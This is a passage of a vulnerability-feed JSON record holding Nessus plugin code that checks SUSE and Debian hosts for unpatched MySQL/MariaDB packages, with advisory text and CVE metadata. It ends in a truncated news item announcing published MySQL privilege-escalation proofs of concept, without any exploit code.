audit(AUDIT_OS_NOT, \"SLES12 SP1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-client-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-client-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-debugsource-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-errormessages-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-tools-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-tools-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-client-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-client-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-debugsource-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-errormessages-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-tools-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-tools-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-client-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-client-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-debugsource-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-errormessages-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-client-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-client-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-debugsource-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-errormessages-10.0.29-22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mariadb\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:47:09", "description": "This mysql version update to 5.5.54 fixes the following issues :\n\n - CVE-2017-3318: Unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: Unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3313: Unspecified vulnerability affecting the\n MyISAM component (bsc#1020890)\n\n - CVE-2017-3312: Insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: Unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: Unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: Unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3244: Unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: Unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: Unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n Release Notes:\n http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-\n 54.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-07T00:00:00", "title": "SUSE SLES11 Security Update : mysql (SUSE-SU-2017:0408-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3258"], "modified": "2017-02-07T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:mysql", "p-cpe:/a:novell:suse_linux:mysql-tools", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:libmysql55client18", "p-cpe:/a:novell:suse_linux:libmysql55client_r18", "p-cpe:/a:novell:suse_linux:mysql-client"], "id": "SUSE_SU-2017-0408-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97046", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0408-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97046);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3312\", \"CVE-2017-3313\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n\n script_name(english:\"SUSE SLES11 Security Update : mysql (SUSE-SU-2017:0408-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This mysql version update to 5.5.54 fixes the following issues :\n\n - CVE-2017-3318: Unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: Unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3313: Unspecified vulnerability affecting the\n MyISAM component (bsc#1020890)\n\n - CVE-2017-3312: Insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: Unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: Unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: Unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3244: Unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: Unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: Unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n Release Notes:\n http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-\n 54.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-54.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-54.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020884\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3238/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3243/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3244/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3258/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3265/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3291/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3312/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3313/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3317/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3318/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170408-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f341f135\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5:zypper in -t patch sleclo50sp3-mysql-12971=1\n\nSUSE Manager Proxy 2.1:zypper in -t patch slemap21-mysql-12971=1\n\nSUSE Manager 2.1:zypper in -t patch sleman21-mysql-12971=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-mysql-12971=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-mysql-12971=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-mysql-12971=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-mysql-12971=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-mysql-12971=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-mysql-12971=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysql55client18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysql55client_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libmysql55client18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libmysql55client_r18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libmysql55client18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libmysql55client_r18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libmysql55client18-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libmysql55client_r18-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"mysql-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"mysql-client-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"mysql-tools-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libmysql55client18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libmysql55client18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libmysql55client18-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libmysql55client_r18-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"mysql-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"mysql-client-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"mysql-tools-5.5.54-0.35.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:50:03", "description": "Several issues have been discovered in the MariaDB database server.\nThe vulnerabilities are addressed by upgrading MariaDB to the new\nupstream version 10.0.29. Please see the MariaDB 10.0 Release Notes\nfor further details :\n\n -\n https://mariadb.com/kb/en/mariadb/mariadb-10029-release-\n notes/", "edition": 28, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-23T00:00:00", "title": "Debian DSA-3770-1 : mariadb-10.0 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "modified": "2017-01-23T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mariadb-10.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3770.NASL", "href": "https://www.tenable.com/plugins/nessus/96669", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3770. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96669);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n script_xref(name:\"DSA\", value:\"3770\");\n\n script_name(english:\"Debian DSA-3770-1 : mariadb-10.0 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been discovered in the MariaDB database server.\nThe vulnerabilities are addressed by upgrading MariaDB to the new\nupstream version 10.0.29. Please see the MariaDB 10.0 Release Notes\nfor further details :\n\n -\n https://mariadb.com/kb/en/mariadb/mariadb-10029-release-\n notes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842895\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=851755\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10029-release-notes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/mariadb-10.0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3770\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mariadb-10.0 packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 10.0.29-0+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mariadb-10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libmariadbd-dev\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-client\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-client-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-client-core-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-common\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-connect-engine-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-oqgraph-engine-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-server\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-server-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-server-core-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-test\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-test-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2016-11-08T20:52:45", "bulletinFamily": "info", "cvelist": ["CVE-2016-6663", "CVE-2016-6664"], "edition": 1, "description": "! [](/Article/UploadPic/2016-11/2 0 1 6 1 1 5 3 3 3 1 2 0 8. png? www. myhack58. com) \nLast week, a man named Dawid Golunski Polish hackers discovered the existence of the MySQL vulnerabilities: a remote root code execution exploit and a privilege escalation vulnerability. At the time, Golunski only provides the first vulnerability poc, but the commitment will disclose a second Vulnerability(CVE-2 0 1 6-6 6 6 3)for more details. \nOn Tuesday, Golunski published for two vulnerabilities in the PoC: the first PoC for The is before the high-risk privilege escalation vulnerability, and another PoC for the it is a new root privilege escalation vulnerability exploit this vulnerability, an attacker can access to the entire database permissions. \nVulnerability number \nCVE-2 0 1 6-6 6 6 3 \nCVE-2 0 1 6-6 6 6 4 \nVulnerability 